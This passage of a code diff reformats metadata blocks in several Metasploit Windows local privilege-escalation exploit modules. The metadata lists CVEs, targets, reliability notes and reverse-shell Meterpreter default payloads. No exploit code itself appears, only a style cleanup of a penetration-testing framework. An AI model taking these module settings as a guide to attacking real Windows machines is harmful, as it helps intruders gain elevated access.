         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'Platform' => 'win',
         'SessionTypes' => [ 'meterpreter' ],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
-            ]
-          ],
-        'Notes' =>
-        {
+            'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
+          ]
+        ],
+        'Notes' => {
           'SideEffects' => [ ARTIFACTS_ON_DISK ],
           'Reliability' => [ UNRELIABLE_SESSION ],
           'Stability' => [ SERVICE_RESOURCE_LOSS ]

--- a/modules/exploits/windows/local/cve_2019_1458_wizardopium.rb
+++ b/modules/exploits/windows/local/cve_2019_1458_wizardopium.rb
@@ -33,32 +33,28 @@ class MetasploitModule < Msf::Exploit::Local
             target machine to reboot when the session is terminated.
           },
           'License' => MSF_LICENSE,
-          'Author' =>
-              [
-                'piotrflorczyk', # poc
-                'unamer', # exploit
-                'timwr', # msf module
-              ],
+          'Author' => [
+            'piotrflorczyk', # poc
+            'unamer', # exploit
+            'timwr', # msf module
+          ],
           'Platform' => 'win',
           'SessionTypes' => ['meterpreter'],
-          'Targets' =>
-              [
-                ['Windows 7 x64', { 'Arch' => ARCH_X64 }]
-              ],
-          'Notes' =>
-              {
-                'Stability' => [ CRASH_OS_RESTARTS ],
-                'Reliability' => [ UNRELIABLE_SESSION ],
-                'SideEffects' => [ IOC_IN_LOGS ]
-              },
-          'References' =>
-              [
-                ['CVE', '2019-1458'],
-                ['URL', 'https://github.com/unamer/CVE-2019-1458'],
-                ['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'],
-                ['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'],
-                ['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html']
-              ],
+          'Targets' => [
+            ['Windows 7 x64', { 'Arch' => ARCH_X64 }]
+          ],
+          'Notes' => {
+            'Stability' => [ CRASH_OS_RESTARTS ],
+            'Reliability' => [ UNRELIABLE_SESSION ],
+            'SideEffects' => [ IOC_IN_LOGS ]
+          },
+          'References' => [
+            ['CVE', '2019-1458'],
+            ['URL', 'https://github.com/unamer/CVE-2019-1458'],
+            ['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'],
+            ['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'],
+            ['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html']
+          ],
           'DisclosureDate' => '2019-12-10',
           'DefaultTarget' => 0,
           'AKA' => [ 'WizardOpium' ]

--- a/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb
+++ b/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb
@@ -26,42 +26,37 @@ class MetasploitModule < Msf::Exploit::Local
           targets.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'itm4n', # PoC
-            'bwatters-r7' # msf module
-          ],
+        'Author' => [
+          'itm4n', # PoC
+          'bwatters-r7' # msf module
+        ],
         'Platform' => ['win'],
         'SessionTypes' => ['meterpreter'],
-        'Targets' =>
-          [
-            ['Windows x64', { 'Arch' => ARCH_X64 }]
-          ],
+        'Targets' => [
+          ['Windows x64', { 'Arch' => ARCH_X64 }]
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2020-02-11',
-        'References' =>
-          [
-            ['CVE', '2020-0668'],
-            ['URL', 'https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/'],
-            ['URL', 'https://github.com/itm4n/SysTracingPoc'],
-            ['URL', 'https://github.com/RedCursorSecurityConsulting/CVE-2020-0668'],
-            ['PACKETSTORM', '156576'],
-            ['URL', 'https://attackerkb.com/assessments/ea5921d4-6046-4a3b-963f-08e8bde1762a'],
-            ['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html']
-          ],
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK ],
-            'Reliability' => [ REPEATABLE_SESSION ]
-          },
-        'DefaultOptions' =>
-          {
-            'DisablePayloadHandler' => false,
-            'EXITFUNC' => 'thread',
-            'Payload' => 'windows/x64/meterpreter/reverse_tcp',
-            'WfsDelay' => 900
-          }
+        'References' => [
+          ['CVE', '2020-0668'],
+          ['URL', 'https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/'],
+          ['URL', 'https://github.com/itm4n/SysTracingPoc'],
+          ['URL', 'https://github.com/RedCursorSecurityConsulting/CVE-2020-0668'],
+          ['PACKETSTORM', '156576'],
+          ['URL', 'https://attackerkb.com/assessments/ea5921d4-6046-4a3b-963f-08e8bde1762a'],
+          ['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html']
+        ],
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => false,
+          'EXITFUNC' => 'thread',
+          'Payload' => 'windows/x64/meterpreter/reverse_tcp',
+          'WfsDelay' => 900
+        }
       )
     )
 

--- a/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb
+++ b/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb
@@ -34,43 +34,38 @@ class MetasploitModule < Msf::Exploit::Local
           so your mileage may vary on Windows Server 2016 and later.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'itm4n', # PoC
-            'gwillcox-r7' # msf module
-          ],
+        'Author' => [
+          'itm4n', # PoC
+          'gwillcox-r7' # msf module
+        ],
         'Platform' => ['win'],
         'SessionTypes' => ['meterpreter'],
         'Privileged' => true,
         'Arch' => [ARCH_X86, ARCH_X64],
-        'Targets' =>
-          [
-            [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
-          ],
+        'Targets' => [
+          [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2020-03-10',
-        'References' =>
-          [
-            ['CVE', '2020-0787'],
-            ['URL', 'https://itm4n.github.io/cve-2020-0787-windows-bits-eop/'],
-            ['URL', 'https://github.com/itm4n/BitsArbitraryFileMove'],
-            ['URL', 'https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8'],
-            ['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'],
-            ['URL', 'https://itm4n.github.io/usodllloader-part1/'],
-            ['URL', 'https://itm4n.github.io/usodllloader-part2/'],
-          ],
-        'Notes' =>
-          {
-            'SideEffects' => [ ARTIFACTS_ON_DISK ],
-            'Reliability' => [ REPEATABLE_SESSION ],
-            'Stability' => [ CRASH_SAFE ]
-          },
-        'DefaultOptions' =>
-          {
-            'EXITFUNC' => 'thread',
-            'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
-            'WfsDelay' => 900
-          }
+        'References' => [
+          ['CVE', '2020-0787'],
+          ['URL', 'https://itm4n.github.io/cve-2020-0787-windows-bits-eop/'],
+          ['URL', 'https://github.com/itm4n/BitsArbitraryFileMove'],
+          ['URL', 'https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8'],
+          ['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'],
+          ['URL', 'https://itm4n.github.io/usodllloader-part1/'],
+          ['URL', 'https://itm4n.github.io/usodllloader-part2/'],
+        ],
+        'Notes' => {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ]
+        },
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread',
+          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+          'WfsDelay' => 900
+        }
       )
     )
 

--- a/modules/exploits/windows/local/cve_2020_0796_smbghost.rb
+++ b/modules/exploits/windows/local/cve_2020_0796_smbghost.rb
@@ -32,35 +32,30 @@ class MetasploitModule < Msf::Exploit::Local
           'Arch' => [ ARCH_X86, ARCH_X64 ],
           'Platform' => 'win',
           'SessionTypes' => [ 'meterpreter' ],
-          'DefaultOptions' =>
-        {
-          'EXITFUNC' => 'thread'
-        },
-          'Targets' =>
-        [
-          # [ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ],
-          [ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ]
-        ],
-          'Payload' =>
-        {
-          'DisableNops' => true
-        },
-          'References' =>
-        [
-          [ 'CVE', '2020-0796' ],
-          [ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ],
-          [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ]
-        ],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread'
+          },
+          'Targets' => [
+            # [ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ],
+            [ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ]
+          ],
+          'Payload' => {
+            'DisableNops' => true
+          },
+          'References' => [
+            [ 'CVE', '2020-0796' ],
+            [ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ],
+            [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ]
+          ],
           'DisclosureDate' => '2020-03-13',
           'DefaultTarget' => 0,
-          'Notes' =>
-        {
-          'AKA' => [ 'SMBGhost', 'CoronaBlue' ],
-          'Stability' => [ CRASH_OS_RESTARTS, ],
-          'SideEffects' => [ IOC_IN_LOGS ],
-          'Reliability' => [ REPEATABLE_SESSION, ],
-          'RelatedModules' => [ 'exploit/windows/smb/cve_2020_0796_smbghost' ]
-        }
+          'Notes' => {
+            'AKA' => [ 'SMBGhost', 'CoronaBlue' ],
+            'Stability' => [ CRASH_OS_RESTARTS, ],
+            'SideEffects' => [ IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION, ],
+            'RelatedModules' => [ 'exploit/windows/smb/cve_2020_0796_smbghost' ]
+          }
         }
       )
     )

--- a/modules/exploits/windows/local/cve_2020_1048_printerdemon.rb
+++ b/modules/exploits/windows/local/cve_2020_1048_printerdemon.rb
@@ -24,30 +24,26 @@ class MetasploitModule < Msf::Exploit::Local
           adds a permanent elevated backdoor.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Yarden Shafir', # Original discovery
-            'Alex Ionescu', # Original discovery
-            'shubham0d', # PoC
-            'bwatters-r7' # msf module
-          ],
+        'Author' => [
+          'Yarden Shafir', # Original discovery
+          'Alex Ionescu', # Original discovery
+          'shubham0d', # PoC
+          'bwatters-r7' # msf module
+        ],
         'Platform' => ['win'],
         'SessionTypes' => ['meterpreter'],
-        'Targets' =>
-          [
-            [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
-          ],
+        'Targets' => [
+          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2019-11-04',
-        'References' =>
-          [
-            ['CVE', '2020-1048'],
-            ['URL', 'https://windows-internals.com/printdemon-cve-2020-1048/']
-          ],
-        'DefaultOptions' =>
-          {
-            'DisablePayloadHandler' => true
-          },
+        'References' => [
+          ['CVE', '2020-1048'],
+          ['URL', 'https://windows-internals.com/printdemon-cve-2020-1048/']
+        ],
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => true
+        },
         'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
       )
     )

--- a/modules/exploits/windows/local/cve_2020_1054_drawiconex_lpe.rb
+++ b/modules/exploits/windows/local/cve_2020_1054_drawiconex_lpe.rb
@@ -34,42 +34,37 @@ class MetasploitModule < Msf::Exploit::Local
             Windows.
           },
           'License' => MSF_LICENSE,
-          'Author' =>
-              [
-                'Netanel Ben-Simon',
-                'Yoav Alon',
-                'bee13oy',
-                'timwr', # msf module
-              ],
+          'Author' => [
+            'Netanel Ben-Simon',
+            'Yoav Alon',
+            'bee13oy',
+            'timwr', # msf module
+          ],
           'Platform' => 'win',
           'SessionTypes' => ['meterpreter'],
-          'Targets' =>
-              [
-                ['Windows 7 x64', { 'Arch' => ARCH_X64 }]
-              ],
+          'Targets' => [
+            ['Windows 7 x64', { 'Arch' => ARCH_X64 }]
+          ],
           'DefaultTarget' => 0,
           'DefaultOptions' => {
             'WfsDelay' => 30
           },
-          'Payload' =>
-          {
+          'Payload' => {
             'Space' => 4096
           },
-          'Notes' =>
-              {
-                'Stability' => [ CRASH_OS_RESTARTS ],
-                'Reliability' => [ UNRELIABLE_SESSION ],
-                'SideEffects' => [ IOC_IN_LOGS ]
-              },
-          'References' =>
-              [
-                ['CVE', '2020-1054'],
-                ['URL', 'https://cpr-zero.checkpoint.com/vulns/cprid-2153/'],
-                ['URL', 'https://0xeb-bp.com/blog/2020/06/15/cve-2020-1054-analysis.html'],
-                ['URL', 'https://github.com/DreamoneOnly/2020-1054/blob/master/x64_src/main.cpp'],
-                ['URL', 'https://github.com/KaLendsi/CVE-2020-1054/blob/master/CVE-2020-1054/exploit.cpp'],
-                ['URL', 'https://github.com/Iamgublin/CVE-2020-1054/blob/master/ConsoleApplication4.cpp']
-              ],
+          'Notes' => {
+            'Stability' => [ CRASH_OS_RESTARTS ],
+            'Reliability' => [ UNRELIABLE_SESSION ],
+            'SideEffects' => [ IOC_IN_LOGS ]
+          },
+          'References' => [
+            ['CVE', '2020-1054'],
+            ['URL', 'https://cpr-zero.checkpoint.com/vulns/cprid-2153/'],
+            ['URL', 'https://0xeb-bp.com/blog/2020/06/15/cve-2020-1054-analysis.html'],
+            ['URL', 'https://github.com/DreamoneOnly/2020-1054/blob/master/x64_src/main.cpp'],
+            ['URL', 'https://github.com/KaLendsi/CVE-2020-1054/blob/master/CVE-2020-1054/exploit.cpp'],
+            ['URL', 'https://github.com/Iamgublin/CVE-2020-1054/blob/master/ConsoleApplication4.cpp']
+          ],
           'DisclosureDate' => '2020-02-20'
         )
     )

--- a/modules/exploits/windows/local/cve_2020_1313_system_orchestrator.rb
+++ b/modules/exploits/windows/local/cve_2020_1313_system_orchestrator.rb
@@ -24,28 +24,24 @@ class MetasploitModule < Msf::Exploit::Local
           execute as system sometime in the next 24 hours.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Imre Rad', # Original discovery? and PoC (https://github.com/irsl/CVE-2020-1313)
-            'bwatters-r7' # msf module
-          ],
+        'Author' => [
+          'Imre Rad', # Original discovery? and PoC (https://github.com/irsl/CVE-2020-1313)
+          'bwatters-r7' # msf module
+        ],
         'Platform' => ['win'],
         'SessionTypes' => ['meterpreter'],
-        'Targets' =>
-          [
-            ['Windows x64', { 'Arch' => ARCH_X64 }]
-          ],
+        'Targets' => [
+          ['Windows x64', { 'Arch' => ARCH_X64 }]
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2019-11-04',
-        'References' =>
-          [
-            ['CVE', '2020-1313'],
-            ['URL', 'https://github.com/irsl/CVE-2020-1313']
-          ],
-        'DefaultOptions' =>
-          {
-            'DisablePayloadHandler' => true
-          }
+        'References' => [
+          ['CVE', '2020-1313'],
+          ['URL', 'https://github.com/irsl/CVE-2020-1313']
+        ],
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => true
+        }
       )
     )
 

--- a/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
+++ b/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
@@ -29,33 +29,29 @@ class MetasploitModule < Msf::Exploit::Local
           adds a permanent elevated backdoor.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Peleg Hadar', # Original discovery
-            'Tomer Bar', # Original discovery
-            '404death', # PoC
-            'sailay1996', # PoC
-            'bwatters-r7' # msf module
-          ],
+        'Author' => [
+          'Peleg Hadar', # Original discovery
+          'Tomer Bar', # Original discovery
+          '404death', # PoC
+          'sailay1996', # PoC
+          'bwatters-r7' # msf module
+        ],
         'Platform' => ['win'],
         'SessionTypes' => ['meterpreter'],
-        'Targets' =>
-          [
-            [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
-          ],
+        'Targets' => [
+          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2019-11-04',
-        'References' =>
-          [
-            ['CVE', '2020-1337'],
-            ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1337'],
-            ['URL', 'https://github.com/sailay1996/cve-2020-1337-poc'],
-            ['URL', 'https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/']
-          ],
-        'DefaultOptions' =>
-          {
-            'DisablePayloadHandler' => true
-          },
+        'References' => [
+          ['CVE', '2020-1337'],
+          ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1337'],
+          ['URL', 'https://github.com/sailay1996/cve-2020-1337-poc'],
+          ['URL', 'https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/']
+        ],
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => true
+        },
         'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
       )
     )

--- a/modules/exploits/windows/local/cve_2020_17136.rb
+++ b/modules/exploits/windows/local/cve_2020_17136.rb
@@ -45,10 +45,9 @@ class MetasploitModule < Msf::Exploit::Local
         'SessionTypes' => ['meterpreter'],
         'Privileged' => true,
         'Arch' => [ARCH_X64],
-        'Targets' =>
-          [
-            [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],
-          ],
+        'Targets' => [
+          [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2020-03-10',
         'References' => [
@@ -56,17 +55,15 @@ class MetasploitModule < Msf::Exploit::Local
           ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=2082'],
           ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17136']
         ],
-        'Notes' =>
-          {
-            'SideEffects' => [ ARTIFACTS_ON_DISK ],
-            'Reliability' => [ REPEATABLE_SESSION ],
-            'Stability' => [ CRASH_SAFE ]
-          },
-        'DefaultOptions' =>
-          {
-            'EXITFUNC' => 'process',
-            'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
-          }
+        'Notes' => {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ]
+        },
+        'DefaultOptions' => {
+          'EXITFUNC' => 'process',
+          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+        }
       )
     )
     register_options(

--- a/modules/exploits/windows/local/cve_2021_1732_win32k.rb
+++ b/modules/exploits/windows/local/cve_2021_1732_win32k.rb
@@ -37,39 +37,34 @@ class MetasploitModule < Msf::Exploit::Local
           'Arch' => [ ARCH_X64 ],
           'Platform' => 'win',
           'SessionTypes' => [ 'meterpreter' ],
-          'DefaultOptions' =>
-        {
-          'EXITFUNC' => 'thread'
-        },
-          'Targets' =>
-        [
-          [ 'Windows 10 v1803-20H2 x64', { 'Arch' => ARCH_X64 } ]
-        ],
-          'Payload' =>
-        {
-          'DisableNops' => true
-        },
-          'References' =>
-        [
-          [ 'CVE', '2021-1732' ],
-          [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
-          [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
-          [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
-          [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
-          # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
-          [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
-          [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
-          [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
-          [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ]
-        ],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread'
+          },
+          'Targets' => [
+            [ 'Windows 10 v1803-20H2 x64', { 'Arch' => ARCH_X64 } ]
+          ],
+          'Payload' => {
+            'DisableNops' => true
+          },
+          'References' => [
+            [ 'CVE', '2021-1732' ],
+            [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
+            [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
+            [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
+            [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
+            # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
+            [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
+            [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
+            [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
+            [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ]
+          ],
           'DisclosureDate' => '2021-02-10',
           'DefaultTarget' => 0,
-          'Notes' =>
-        {
-          'Stability' => [ CRASH_OS_RESTARTS, ],
-          'Reliability' => [ REPEATABLE_SESSION, ],
-          'SideEffects' => []
-        }
+          'Notes' => {
+            'Stability' => [ CRASH_OS_RESTARTS, ],
+            'Reliability' => [ REPEATABLE_SESSION, ],
+            'SideEffects' => []
+          }
         }
       )
     )

--- a/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb
+++ b/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb
@@ -32,31 +32,26 @@ class MetasploitModule < Msf::Exploit::Local
           'Arch' => [ ARCH_X64 ],
           'Platform' => 'win',
           'SessionTypes' => [ 'meterpreter' ],
-          'DefaultOptions' =>
-        {
-          'EXITFUNC' => 'thread'
-        },
-          'Targets' =>
-        [
-          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
-        ],
-          'Payload' =>
-        {
-          'DisableNops' => true
-        },
-          'References' =>
-        [
-          [ 'CVE', '2021-21551' ],
-          [ 'URL', 'https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/' ],
-          [ 'URL', 'https://www.dell.com/support/kbdoc/ro-ro/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability' ],
-        ],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread'
+          },
+          'Targets' => [
+            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+          ],
+          'Payload' => {
+            'DisableNops' => true
+          },
+          'References' => [
+            [ 'CVE', '2021-21551' ],
+            [ 'URL', 'https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/' ],
+            [ 'URL', 'https://www.dell.com/support/kbdoc/ro-ro/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability' ],
+          ],
           'DisclosureDate' => '2021-05-04',
           'DefaultTarget' => 0,
-          'Notes' =>
-        {
-          'Stability' => [ CRASH_OS_RESTARTS, ],
-          'Reliability' => [ REPEATABLE_SESSION, ]
-        }
+          'Notes' => {
+            'Stability' => [ CRASH_OS_RESTARTS, ],
+            'Reliability' => [ REPEATABLE_SESSION, ]
+          }
         }
       )
     )

--- a/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
+++ b/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
@@ -36,34 +36,30 @@ class MetasploitModule < Msf::Exploit::Local
           This module has only been tested and confirmed to work on Windows Server 2019 Standard Edition, however it should work against any Windows
           Server version up to and including Windows Server 2019.
         },
-        'References' =>
-          [
-            ['URL', 'https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83'],
-            ['URL', 'https://adsecurity.org/?p=4064'],
-            ['URL', 'http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html']
-          ],
+        'References' => [
+          ['URL', 'https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83'],
+          ['URL', 'https://adsecurity.org/?p=4064'],
+          ['URL', 'http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html']
+        ],
         'DisclosureDate' => '2017-05-08',
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Shay Ber', # vulnerability discovery
-            'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
-          ],
+        'Author' => [
+          'Shay Ber', # vulnerability discovery
+          'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
+        ],
         'Platform' => 'win',
         'Targets' => [[ 'Automatic', {} ]],
         'SessionTypes' => [ 'meterpreter' ],
-        'DefaultOptions' =>
-          {
-            'WfsDelay' => 20,
-            'EXITFUNC' => 'thread'
-          },
-        'Notes' =>
-          {
-            'Stability' => [CRASH_SERVICE_DOWN], # The service can go down if AV picks up on the file at an
-            # non-optimal time or if the UNC path is typed in wrong.
-            'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS],
-            'Reliability' => [REPEATABLE_SESSION]
-          }
+        'DefaultOptions' => {
+          'WfsDelay' => 20,
+          'EXITFUNC' => 'thread'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN], # The service can go down if AV picks up on the file at an
+          # non-optimal time or if the UNC path is typed in wrong.
+          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
       )
     )
 

--- a/modules/exploits/windows/local/docker_credential_wincred.rb
+++ b/modules/exploits/windows/local/docker_credential_wincred.rb
@@ -35,8 +35,7 @@ class MetasploitModule < Msf::Exploit::Local
           'WfsDelay' => 15
         },
         'DisclosureDate' => '2019-07-05',
-        'Notes' =>
-        {
+        'Notes' => {
           'Stability' => [ CRASH_SAFE ],
           'Reliability' => [ REPEATABLE_SESSION ],
           'SideEffects' => [ ARTIFACTS_ON_DISK ]

--- a/modules/exploits/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc.rb
+++ b/modules/exploits/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc.rb
@@ -30,14 +30,12 @@ class MetasploitModule < Msf::Exploit::Local
             6.5.2r99097 and 6.6.3r102156 on Windows 7 SP1 (x64).
           },
           'License' => MSF_LICENSE,
-          'Author' =>
-          [
+          'Author' => [
             'Chris Lyne', # (@lynerc) Discovery and exploit (CVE-2019-3999); discovery of traversal bypass (CVE-2020-5752) for CVE-2019-3999 patch.
             'Matteo Malvica', # Duplicate independent discovery of traversal bypass (CVE-2020-5752)
             'bcoles' # Metasploit
           ],
-          'References' =>
-          [
+          'References' => [
             ['CVE', '2019-3999'],
             ['CVE', '2020-5752'],
             ['EDB', '48400'],
@@ -51,28 +49,23 @@ class MetasploitModule < Msf::Exploit::Local
             ['URL', 'https://github.com/tenable/poc/blob/master/druva/inSync/druva_win_cphwnet64.py'],
             ['URL', 'https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/'],
           ],
-          'Platform' =>
-          [
+          'Platform' => [
             'win'
           ],
-          'SessionTypes' =>
-          [
+          'SessionTypes' => [
             'meterpreter'
           ],
-          'Targets' =>
-          [
+          'Targets' => [
             [
               'Automatic',
               {}
             ]
           ],
           'DisclosureDate' => '2020-02-25',
-          'DefaultOptions' =>
-          {
+          'DefaultOptions' => {
             'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
           },
-          'Notes' =>
-          {
+          'Notes' => {
             'Reliability' =>
             [
               REPEATABLE_SESSION

--- a/modules/exploits/windows/local/gog_galaxyclientservice_privesc.rb
+++ b/modules/exploits/windows/local/gog_galaxyclientservice_privesc.rb
@@ -31,8 +31,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Platform' => [ 'win' ],
         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'SessionTypes' => [ 'meterpreter' ],
-        'Targets' =>
-        [
+        'Targets' => [
           [
             'Windows (Dropper)',
             {
@@ -45,13 +44,11 @@ class MetasploitModule < Msf::Exploit::Local
         ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2020-04-28',
-        'References' =>
-        [
+        'References' => [
           ['URL', 'https://www.positronsecurity.com/blog/2020-04-28-gog-galaxy-client-local-privilege-escalation/'],
           ['CVE', '2020-7352']
         ],
-        'Notes' =>
-        {
+        'Notes' => {
           'SideEffects' => [ ARTIFACTS_ON_DISK ],
           'Reliability' => [ REPEATABLE_SESSION ],
           'Stability' => [ CRASH_SAFE ]

--- a/modules/exploits/windows/local/ikeext_service.rb
+++ b/modules/exploits/windows/local/ikeext_service.rb
